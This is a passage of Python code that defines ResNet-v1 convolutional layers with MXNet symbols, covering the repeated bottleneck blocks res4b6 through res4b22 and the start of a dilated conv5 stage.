bn4b6_branch2b res4b6_branch2b_relu = mx.symbol.Activation(name='res4b6_branch2b_relu', data=scale4b6_branch2b, act_type='relu') res4b6_branch2c = mx.symbol.Convolution(name='res4b6_branch2c', data=res4b6_branch2b_relu, num_filter=1024, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b6_branch2c = mx.symbol.BatchNorm(name='bn4b6_branch2c', data=res4b6_branch2c, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b6_branch2c = bn4b6_branch2c res4b6 = mx.symbol.broadcast_add(name='res4b6', *[res4b5_relu, scale4b6_branch2c]) res4b6_relu = mx.symbol.Activation(name='res4b6_relu', data=res4b6, act_type='relu') res4b7_branch2a = mx.symbol.Convolution(name='res4b7_branch2a', data=res4b6_relu, num_filter=256, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b7_branch2a = mx.symbol.BatchNorm(name='bn4b7_branch2a', data=res4b7_branch2a, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b7_branch2a = bn4b7_branch2a res4b7_branch2a_relu = mx.symbol.Activation(name='res4b7_branch2a_relu', data=scale4b7_branch2a, act_type='relu') res4b7_branch2b = mx.symbol.Convolution(name='res4b7_branch2b', data=res4b7_branch2a_relu, num_filter=256, pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True) bn4b7_branch2b = mx.symbol.BatchNorm(name='bn4b7_branch2b', data=res4b7_branch2b, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b7_branch2b = bn4b7_branch2b res4b7_branch2b_relu = mx.symbol.Activation(name='res4b7_branch2b_relu', data=scale4b7_branch2b, act_type='relu') res4b7_branch2c = mx.symbol.Convolution(name='res4b7_branch2c', data=res4b7_branch2b_relu, num_filter=1024, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b7_branch2c = mx.symbol.BatchNorm(name='bn4b7_branch2c', data=res4b7_branch2c, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b7_branch2c = bn4b7_branch2c res4b7 = mx.symbol.broadcast_add(name='res4b7', *[res4b6_relu, scale4b7_branch2c]) res4b7_relu = mx.symbol.Activation(name='res4b7_relu', data=res4b7, act_type='relu') res4b8_branch2a = mx.symbol.Convolution(name='res4b8_branch2a', data=res4b7_relu, num_filter=256, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b8_branch2a = mx.symbol.BatchNorm(name='bn4b8_branch2a', data=res4b8_branch2a, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b8_branch2a = bn4b8_branch2a res4b8_branch2a_relu = mx.symbol.Activation(name='res4b8_branch2a_relu', data=scale4b8_branch2a, act_type='relu') res4b8_branch2b = mx.symbol.Convolution(name='res4b8_branch2b', data=res4b8_branch2a_relu, num_filter=256, pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True) bn4b8_branch2b = mx.symbol.BatchNorm(name='bn4b8_branch2b', data=res4b8_branch2b, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b8_branch2b = bn4b8_branch2b res4b8_branch2b_relu = mx.symbol.Activation(name='res4b8_branch2b_relu', data=scale4b8_branch2b, act_type='relu') res4b8_branch2c = mx.symbol.Convolution(name='res4b8_branch2c', data=res4b8_branch2b_relu, num_filter=1024, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b8_branch2c = mx.symbol.BatchNorm(name='bn4b8_branch2c', data=res4b8_branch2c, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b8_branch2c = bn4b8_branch2c res4b8 = mx.symbol.broadcast_add(name='res4b8', *[res4b7_relu, scale4b8_branch2c]) res4b8_relu = mx.symbol.Activation(name='res4b8_relu', data=res4b8, act_type='relu') res4b9_branch2a = mx.symbol.Convolution(name='res4b9_branch2a', data=res4b8_relu, num_filter=256, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b9_branch2a = mx.symbol.BatchNorm(name='bn4b9_branch2a', data=res4b9_branch2a, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b9_branch2a = bn4b9_branch2a res4b9_branch2a_relu = mx.symbol.Activation(name='res4b9_branch2a_relu', data=scale4b9_branch2a, act_type='relu') res4b9_branch2b = mx.symbol.Convolution(name='res4b9_branch2b', data=res4b9_branch2a_relu, num_filter=256, pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True) bn4b9_branch2b = mx.symbol.BatchNorm(name='bn4b9_branch2b', data=res4b9_branch2b, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b9_branch2b = bn4b9_branch2b res4b9_branch2b_relu = mx.symbol.Activation(name='res4b9_branch2b_relu', data=scale4b9_branch2b, act_type='relu') res4b9_branch2c = mx.symbol.Convolution(name='res4b9_branch2c', data=res4b9_branch2b_relu, num_filter=1024, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b9_branch2c = mx.symbol.BatchNorm(name='bn4b9_branch2c', data=res4b9_branch2c, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b9_branch2c = bn4b9_branch2c res4b9 = mx.symbol.broadcast_add(name='res4b9', *[res4b8_relu, scale4b9_branch2c]) res4b9_relu = mx.symbol.Activation(name='res4b9_relu', data=res4b9, act_type='relu') res4b10_branch2a = mx.symbol.Convolution(name='res4b10_branch2a', data=res4b9_relu, num_filter=256, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b10_branch2a = mx.symbol.BatchNorm(name='bn4b10_branch2a', data=res4b10_branch2a, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b10_branch2a = bn4b10_branch2a res4b10_branch2a_relu = mx.symbol.Activation(name='res4b10_branch2a_relu', data=scale4b10_branch2a, act_type='relu') res4b10_branch2b = mx.symbol.Convolution(name='res4b10_branch2b', data=res4b10_branch2a_relu, num_filter=256, pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True) bn4b10_branch2b = mx.symbol.BatchNorm(name='bn4b10_branch2b', data=res4b10_branch2b, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b10_branch2b = bn4b10_branch2b res4b10_branch2b_relu = mx.symbol.Activation(name='res4b10_branch2b_relu', data=scale4b10_branch2b, act_type='relu') res4b10_branch2c = mx.symbol.Convolution(name='res4b10_branch2c', data=res4b10_branch2b_relu, num_filter=1024, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b10_branch2c = mx.symbol.BatchNorm(name='bn4b10_branch2c', data=res4b10_branch2c, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b10_branch2c = bn4b10_branch2c res4b10 = mx.symbol.broadcast_add(name='res4b10', *[res4b9_relu, scale4b10_branch2c]) res4b10_relu = mx.symbol.Activation(name='res4b10_relu', data=res4b10, act_type='relu') res4b11_branch2a = mx.symbol.Convolution(name='res4b11_branch2a', data=res4b10_relu, num_filter=256, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b11_branch2a = mx.symbol.BatchNorm(name='bn4b11_branch2a', data=res4b11_branch2a, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b11_branch2a = bn4b11_branch2a res4b11_branch2a_relu = mx.symbol.Activation(name='res4b11_branch2a_relu', data=scale4b11_branch2a, act_type='relu') res4b11_branch2b = mx.symbol.Convolution(name='res4b11_branch2b', data=res4b11_branch2a_relu, num_filter=256, pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True) bn4b11_branch2b = mx.symbol.BatchNorm(name='bn4b11_branch2b', data=res4b11_branch2b, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b11_branch2b = bn4b11_branch2b res4b11_branch2b_relu = mx.symbol.Activation(name='res4b11_branch2b_relu', data=scale4b11_branch2b, act_type='relu') res4b11_branch2c = mx.symbol.Convolution(name='res4b11_branch2c', data=res4b11_branch2b_relu, num_filter=1024, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b11_branch2c = mx.symbol.BatchNorm(name='bn4b11_branch2c', data=res4b11_branch2c, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b11_branch2c = bn4b11_branch2c res4b11 = mx.symbol.broadcast_add(name='res4b11', *[res4b10_relu, scale4b11_branch2c]) res4b11_relu = mx.symbol.Activation(name='res4b11_relu', data=res4b11, act_type='relu') res4b12_branch2a = mx.symbol.Convolution(name='res4b12_branch2a', data=res4b11_relu, num_filter=256, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b12_branch2a = mx.symbol.BatchNorm(name='bn4b12_branch2a', data=res4b12_branch2a, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b12_branch2a = bn4b12_branch2a res4b12_branch2a_relu = mx.symbol.Activation(name='res4b12_branch2a_relu', data=scale4b12_branch2a, act_type='relu') res4b12_branch2b = mx.symbol.Convolution(name='res4b12_branch2b', data=res4b12_branch2a_relu, num_filter=256, pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True) bn4b12_branch2b = mx.symbol.BatchNorm(name='bn4b12_branch2b', data=res4b12_branch2b, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b12_branch2b = bn4b12_branch2b res4b12_branch2b_relu = mx.symbol.Activation(name='res4b12_branch2b_relu', data=scale4b12_branch2b, act_type='relu') res4b12_branch2c = mx.symbol.Convolution(name='res4b12_branch2c', data=res4b12_branch2b_relu, num_filter=1024, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b12_branch2c = mx.symbol.BatchNorm(name='bn4b12_branch2c', data=res4b12_branch2c, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b12_branch2c = bn4b12_branch2c res4b12 = mx.symbol.broadcast_add(name='res4b12', *[res4b11_relu, scale4b12_branch2c]) res4b12_relu = mx.symbol.Activation(name='res4b12_relu', data=res4b12, act_type='relu') res4b13_branch2a = mx.symbol.Convolution(name='res4b13_branch2a', data=res4b12_relu, num_filter=256, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b13_branch2a = mx.symbol.BatchNorm(name='bn4b13_branch2a', data=res4b13_branch2a, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b13_branch2a = bn4b13_branch2a res4b13_branch2a_relu = mx.symbol.Activation(name='res4b13_branch2a_relu', data=scale4b13_branch2a, act_type='relu') res4b13_branch2b = mx.symbol.Convolution(name='res4b13_branch2b', data=res4b13_branch2a_relu, num_filter=256, pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True) bn4b13_branch2b = mx.symbol.BatchNorm(name='bn4b13_branch2b', data=res4b13_branch2b, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b13_branch2b = bn4b13_branch2b res4b13_branch2b_relu = mx.symbol.Activation(name='res4b13_branch2b_relu', data=scale4b13_branch2b, act_type='relu') res4b13_branch2c = mx.symbol.Convolution(name='res4b13_branch2c', data=res4b13_branch2b_relu, num_filter=1024, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b13_branch2c = mx.symbol.BatchNorm(name='bn4b13_branch2c', data=res4b13_branch2c, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b13_branch2c = bn4b13_branch2c res4b13 = mx.symbol.broadcast_add(name='res4b13', *[res4b12_relu, scale4b13_branch2c]) res4b13_relu = mx.symbol.Activation(name='res4b13_relu', data=res4b13, act_type='relu') res4b14_branch2a = mx.symbol.Convolution(name='res4b14_branch2a', data=res4b13_relu, num_filter=256, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b14_branch2a = mx.symbol.BatchNorm(name='bn4b14_branch2a', data=res4b14_branch2a, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b14_branch2a = bn4b14_branch2a res4b14_branch2a_relu = mx.symbol.Activation(name='res4b14_branch2a_relu', data=scale4b14_branch2a, act_type='relu') res4b14_branch2b = mx.symbol.Convolution(name='res4b14_branch2b', data=res4b14_branch2a_relu, num_filter=256, pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True) bn4b14_branch2b = mx.symbol.BatchNorm(name='bn4b14_branch2b', data=res4b14_branch2b, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b14_branch2b = bn4b14_branch2b res4b14_branch2b_relu = mx.symbol.Activation(name='res4b14_branch2b_relu', data=scale4b14_branch2b, act_type='relu') res4b14_branch2c = mx.symbol.Convolution(name='res4b14_branch2c', data=res4b14_branch2b_relu, num_filter=1024, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b14_branch2c = mx.symbol.BatchNorm(name='bn4b14_branch2c', data=res4b14_branch2c, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b14_branch2c = bn4b14_branch2c res4b14 = mx.symbol.broadcast_add(name='res4b14', *[res4b13_relu, scale4b14_branch2c]) res4b14_relu = mx.symbol.Activation(name='res4b14_relu', data=res4b14, act_type='relu') res4b15_branch2a = mx.symbol.Convolution(name='res4b15_branch2a', data=res4b14_relu, num_filter=256, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b15_branch2a = mx.symbol.BatchNorm(name='bn4b15_branch2a', data=res4b15_branch2a, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b15_branch2a = bn4b15_branch2a res4b15_branch2a_relu = mx.symbol.Activation(name='res4b15_branch2a_relu', data=scale4b15_branch2a, act_type='relu') res4b15_branch2b = mx.symbol.Convolution(name='res4b15_branch2b', data=res4b15_branch2a_relu, num_filter=256, pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True) bn4b15_branch2b = mx.symbol.BatchNorm(name='bn4b15_branch2b', data=res4b15_branch2b, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b15_branch2b = bn4b15_branch2b res4b15_branch2b_relu = mx.symbol.Activation(name='res4b15_branch2b_relu', data=scale4b15_branch2b, act_type='relu') res4b15_branch2c = mx.symbol.Convolution(name='res4b15_branch2c', data=res4b15_branch2b_relu, num_filter=1024, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b15_branch2c = mx.symbol.BatchNorm(name='bn4b15_branch2c', data=res4b15_branch2c, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b15_branch2c = bn4b15_branch2c res4b15 = mx.symbol.broadcast_add(name='res4b15', *[res4b14_relu, scale4b15_branch2c]) res4b15_relu = mx.symbol.Activation(name='res4b15_relu', data=res4b15, act_type='relu') res4b16_branch2a = mx.symbol.Convolution(name='res4b16_branch2a', data=res4b15_relu, num_filter=256, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b16_branch2a = mx.symbol.BatchNorm(name='bn4b16_branch2a', data=res4b16_branch2a, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b16_branch2a = bn4b16_branch2a res4b16_branch2a_relu = mx.symbol.Activation(name='res4b16_branch2a_relu', data=scale4b16_branch2a, act_type='relu') res4b16_branch2b = mx.symbol.Convolution(name='res4b16_branch2b', data=res4b16_branch2a_relu, num_filter=256, pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True) bn4b16_branch2b = mx.symbol.BatchNorm(name='bn4b16_branch2b', data=res4b16_branch2b, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b16_branch2b = bn4b16_branch2b res4b16_branch2b_relu = mx.symbol.Activation(name='res4b16_branch2b_relu', data=scale4b16_branch2b, act_type='relu') res4b16_branch2c = mx.symbol.Convolution(name='res4b16_branch2c', data=res4b16_branch2b_relu, num_filter=1024, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b16_branch2c = mx.symbol.BatchNorm(name='bn4b16_branch2c', data=res4b16_branch2c, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b16_branch2c = bn4b16_branch2c res4b16 = mx.symbol.broadcast_add(name='res4b16', *[res4b15_relu, scale4b16_branch2c]) res4b16_relu = mx.symbol.Activation(name='res4b16_relu', data=res4b16, act_type='relu') res4b17_branch2a = mx.symbol.Convolution(name='res4b17_branch2a', data=res4b16_relu, num_filter=256, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b17_branch2a = mx.symbol.BatchNorm(name='bn4b17_branch2a', data=res4b17_branch2a, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b17_branch2a = bn4b17_branch2a res4b17_branch2a_relu = mx.symbol.Activation(name='res4b17_branch2a_relu', data=scale4b17_branch2a, act_type='relu') res4b17_branch2b = mx.symbol.Convolution(name='res4b17_branch2b', data=res4b17_branch2a_relu, num_filter=256, pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True) bn4b17_branch2b = mx.symbol.BatchNorm(name='bn4b17_branch2b', data=res4b17_branch2b, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b17_branch2b = bn4b17_branch2b res4b17_branch2b_relu = mx.symbol.Activation(name='res4b17_branch2b_relu', data=scale4b17_branch2b, act_type='relu') res4b17_branch2c = mx.symbol.Convolution(name='res4b17_branch2c', data=res4b17_branch2b_relu, num_filter=1024, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b17_branch2c = mx.symbol.BatchNorm(name='bn4b17_branch2c', data=res4b17_branch2c, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b17_branch2c = bn4b17_branch2c res4b17 = mx.symbol.broadcast_add(name='res4b17', *[res4b16_relu, scale4b17_branch2c]) res4b17_relu = mx.symbol.Activation(name='res4b17_relu', data=res4b17, act_type='relu') res4b18_branch2a = mx.symbol.Convolution(name='res4b18_branch2a', data=res4b17_relu, num_filter=256, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b18_branch2a = mx.symbol.BatchNorm(name='bn4b18_branch2a', data=res4b18_branch2a, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b18_branch2a = bn4b18_branch2a res4b18_branch2a_relu = mx.symbol.Activation(name='res4b18_branch2a_relu', data=scale4b18_branch2a, act_type='relu') res4b18_branch2b = mx.symbol.Convolution(name='res4b18_branch2b', data=res4b18_branch2a_relu, num_filter=256, pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True) bn4b18_branch2b = mx.symbol.BatchNorm(name='bn4b18_branch2b', data=res4b18_branch2b, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b18_branch2b = bn4b18_branch2b res4b18_branch2b_relu = mx.symbol.Activation(name='res4b18_branch2b_relu', data=scale4b18_branch2b, act_type='relu') res4b18_branch2c = mx.symbol.Convolution(name='res4b18_branch2c', data=res4b18_branch2b_relu, num_filter=1024, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b18_branch2c = mx.symbol.BatchNorm(name='bn4b18_branch2c', data=res4b18_branch2c, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b18_branch2c = bn4b18_branch2c res4b18 = mx.symbol.broadcast_add(name='res4b18', *[res4b17_relu, scale4b18_branch2c]) res4b18_relu = mx.symbol.Activation(name='res4b18_relu', data=res4b18, act_type='relu') res4b19_branch2a = mx.symbol.Convolution(name='res4b19_branch2a', data=res4b18_relu, num_filter=256, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b19_branch2a = mx.symbol.BatchNorm(name='bn4b19_branch2a', data=res4b19_branch2a, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b19_branch2a = bn4b19_branch2a res4b19_branch2a_relu = mx.symbol.Activation(name='res4b19_branch2a_relu', data=scale4b19_branch2a, act_type='relu') res4b19_branch2b = mx.symbol.Convolution(name='res4b19_branch2b', data=res4b19_branch2a_relu, num_filter=256, pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True) bn4b19_branch2b = mx.symbol.BatchNorm(name='bn4b19_branch2b', data=res4b19_branch2b, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b19_branch2b = bn4b19_branch2b res4b19_branch2b_relu = mx.symbol.Activation(name='res4b19_branch2b_relu', data=scale4b19_branch2b, act_type='relu') res4b19_branch2c = mx.symbol.Convolution(name='res4b19_branch2c', data=res4b19_branch2b_relu, num_filter=1024, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b19_branch2c = mx.symbol.BatchNorm(name='bn4b19_branch2c', data=res4b19_branch2c, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b19_branch2c = bn4b19_branch2c res4b19 = mx.symbol.broadcast_add(name='res4b19', *[res4b18_relu, scale4b19_branch2c]) res4b19_relu = mx.symbol.Activation(name='res4b19_relu', data=res4b19, act_type='relu') res4b20_branch2a = mx.symbol.Convolution(name='res4b20_branch2a', data=res4b19_relu, num_filter=256, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b20_branch2a = mx.symbol.BatchNorm(name='bn4b20_branch2a', data=res4b20_branch2a, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b20_branch2a = bn4b20_branch2a res4b20_branch2a_relu = mx.symbol.Activation(name='res4b20_branch2a_relu', data=scale4b20_branch2a, act_type='relu') res4b20_branch2b = mx.symbol.Convolution(name='res4b20_branch2b', data=res4b20_branch2a_relu, num_filter=256, pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True) bn4b20_branch2b = mx.symbol.BatchNorm(name='bn4b20_branch2b', data=res4b20_branch2b, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b20_branch2b = bn4b20_branch2b res4b20_branch2b_relu = mx.symbol.Activation(name='res4b20_branch2b_relu', data=scale4b20_branch2b, act_type='relu') res4b20_branch2c = mx.symbol.Convolution(name='res4b20_branch2c', data=res4b20_branch2b_relu, num_filter=1024, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b20_branch2c = mx.symbol.BatchNorm(name='bn4b20_branch2c', data=res4b20_branch2c, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b20_branch2c = bn4b20_branch2c res4b20 = mx.symbol.broadcast_add(name='res4b20', *[res4b19_relu, scale4b20_branch2c]) res4b20_relu = mx.symbol.Activation(name='res4b20_relu', data=res4b20, act_type='relu') res4b21_branch2a = mx.symbol.Convolution(name='res4b21_branch2a', data=res4b20_relu, num_filter=256, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b21_branch2a = mx.symbol.BatchNorm(name='bn4b21_branch2a', data=res4b21_branch2a, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b21_branch2a = bn4b21_branch2a res4b21_branch2a_relu = mx.symbol.Activation(name='res4b21_branch2a_relu', data=scale4b21_branch2a, act_type='relu') res4b21_branch2b = mx.symbol.Convolution(name='res4b21_branch2b', data=res4b21_branch2a_relu, num_filter=256, pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True) bn4b21_branch2b = mx.symbol.BatchNorm(name='bn4b21_branch2b', data=res4b21_branch2b, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b21_branch2b = bn4b21_branch2b res4b21_branch2b_relu = mx.symbol.Activation(name='res4b21_branch2b_relu', data=scale4b21_branch2b, act_type='relu') res4b21_branch2c = mx.symbol.Convolution(name='res4b21_branch2c', data=res4b21_branch2b_relu, num_filter=1024, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b21_branch2c = mx.symbol.BatchNorm(name='bn4b21_branch2c', data=res4b21_branch2c, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b21_branch2c = bn4b21_branch2c res4b21 = mx.symbol.broadcast_add(name='res4b21', *[res4b20_relu, scale4b21_branch2c]) res4b21_relu = mx.symbol.Activation(name='res4b21_relu', data=res4b21, act_type='relu') res4b22_branch2a = mx.symbol.Convolution(name='res4b22_branch2a', data=res4b21_relu, num_filter=256, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b22_branch2a = mx.symbol.BatchNorm(name='bn4b22_branch2a', data=res4b22_branch2a, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b22_branch2a = bn4b22_branch2a res4b22_branch2a_relu = mx.symbol.Activation(name='res4b22_branch2a_relu', data=scale4b22_branch2a, act_type='relu') res4b22_branch2b = mx.symbol.Convolution(name='res4b22_branch2b', data=res4b22_branch2a_relu, num_filter=256, pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True) bn4b22_branch2b = mx.symbol.BatchNorm(name='bn4b22_branch2b', data=res4b22_branch2b, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b22_branch2b = bn4b22_branch2b res4b22_branch2b_relu = mx.symbol.Activation(name='res4b22_branch2b_relu', data=scale4b22_branch2b, act_type='relu') res4b22_branch2c = mx.symbol.Convolution(name='res4b22_branch2c', data=res4b22_branch2b_relu, num_filter=1024, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b22_branch2c = mx.symbol.BatchNorm(name='bn4b22_branch2c', data=res4b22_branch2c, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b22_branch2c = bn4b22_branch2c res4b22 = mx.symbol.broadcast_add(name='res4b22', *[res4b21_relu, scale4b22_branch2c]) res4b22_relu = mx.symbol.Activation(name='res4b22_relu', data=res4b22, act_type='relu') return res4b22_relu def get_resnet_v1_conv5(self, conv_feat): res5a_branch1 = mx.symbol.Convolution(name='res5a_branch1', data=conv_feat, num_filter=2048, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn5a_branch1 = mx.symbol.BatchNorm(name='bn5a_branch1', data=res5a_branch1, use_global_stats=True, fix_gamma=False, eps=self.eps) scale5a_branch1 = bn5a_branch1 res5a_branch2a = mx.symbol.Convolution(name='res5a_branch2a', data=conv_feat, num_filter=512, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn5a_branch2a = mx.symbol.BatchNorm(name='bn5a_branch2a', data=res5a_branch2a, use_global_stats=True, fix_gamma=False, eps=self.eps) scale5a_branch2a = bn5a_branch2a res5a_branch2a_relu = mx.symbol.Activation(name='res5a_branch2a_relu', data=scale5a_branch2a, act_type='relu') res5a_branch2b = mx.symbol.Convolution(name='res5a_branch2b', data=res5a_branch2a_relu, num_filter=512, pad=(2, 2), kernel=(3, 3), stride=(1, 1), dilate=(2, 2), no_bias=True) bn5a_branch2b = mx.symbol.BatchNorm(name='bn5a_branch2b', data=res5a_branch2b, use_global_stats=True, fix_gamma=False, eps=self.eps) scale5a_branch2b = bn5a_branch2b res5a_branch2b_relu = mx.symbol.Activation(name='res5a_branch2b_relu', data=scale5a_branch2b, act_type='relu') res5a_branch2c = mx.symbol.Convolution(name='res5a_branch2c', data=res5a_branch2b_relu, num_filter=2048, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn5a_branch2c = mx.symbol.BatchNorm(name='bn5a_branch2c', data=res5a_branch2c, use_global_stats=True, fix_gamma=False, eps=self.eps) scale5a_branch2c = bn5a_branch2c res5a = mx.symbol.broadcast_add(name='res5a', *[scale5a_branch1, scale5a_branch2c]) res5a_relu = mx.symbol.Activation(name='res5a_relu', data=res5a, act_type='relu') res5b_branch2a = mx.symbol.Convolution(name='res5b_branch2a', data=res5a_relu, num_filter=512, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn5b_branch2a = mx.symbol.BatchNorm(name='bn5b_branch2a', data=res5b_branch2a, use_global_stats=True, fix_gamma=False, eps=self.eps) scale5b_branch2a = bn5b_branch2a res5b_branch2a_relu = mx.symbol.Activation(name='res5b_branch2a_relu', data=scale5b_branch2a, act_type='relu') res5b_branch2b = mx.symbol.Convolution(name='res5b_branch2b', data=res5b_branch2a_relu, num_filter=512, pad=(2, 2), kernel=(3, 3), stride=(1, 1), dilate=(2, 2), no_bias=True) bn5b_branch2b = mx.symbol.BatchNorm(name='bn5b_branch2b', data=res5b_branch2b, use_global_stats=True, fix_gamma=False, eps=self.eps) scale5b_branch2b = bn5b_branch2b res5b_branch2b_relu = mx.symbol.Activation(name='res5b_branch2b_relu', data=scale5b_branch2b, act_type='relu') res5b_branch2c = mx.symbol.Convolution(name='res5b_branch2c', data=res5b_branch2b_relu, num_filter=2048, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn5b_branch2c = mx.symbol.BatchNorm(name='bn5b_branch2c', data=res5b_branch2c, use_global_stats=True, fix_gamma=False, eps=self.eps) scale5b_branch2c = bn5b_branch2c res5b = mx.symbol.broadcast_add(name='res5b', *[res5a_relu, scale5b_branch2c]) res5b_relu = mx.symbol.Activation(name='res5b_relu', data=res5b, act_type='relu') res5c_branch2a = mx.symbol.Convolution(name='res5c_branch2a', data=res5b_relu, num_filter=512, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn5c_branch2a = mx.symbol.BatchNorm(name='bn5c_branch2a', data=res5c_branch2a, use_global_stats=True, fix_gamma=False, eps=self.eps) scale5c_branch2a = bn5c_branch2a res5c_branch2a_relu = mx.symbol.Activation(name='res5c_branch2a_relu', data=scale5c_branch2a, act_type='relu') res5c_branch2b = mx.symbol.Convolution(name='res5c_branch2b', data=res5c_branch2a_relu, num_filter=512, pad=(2, 2), kernel=(3, 3), stride=(1, 1), dilate=(2, 2), no_bias=True) bn5c_branch2b = mx.symbol.BatchNorm(name='bn5c_branch2b', data=res5c_branch2b, use_global_stats=True, fix_gamma=False, eps=self.eps) scale5c_branch2b = bn5c_branch2b res5c_branch2b_relu = mx.symbol.Activation(name='res5c_branch2b_relu', data=scale5c_branch2b, act_type='relu') res5c_branch2c = mx.symbol.Convolution(name='res5c_branch2c', data=res5c_branch2b_relu, num_filter=2048, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn5c_branch2c = mx.symbol.BatchNorm(name='bn5c_branch2c', data=res5c_branch2c, use_global_stats=True, fix_gamma=False, eps=self.eps) 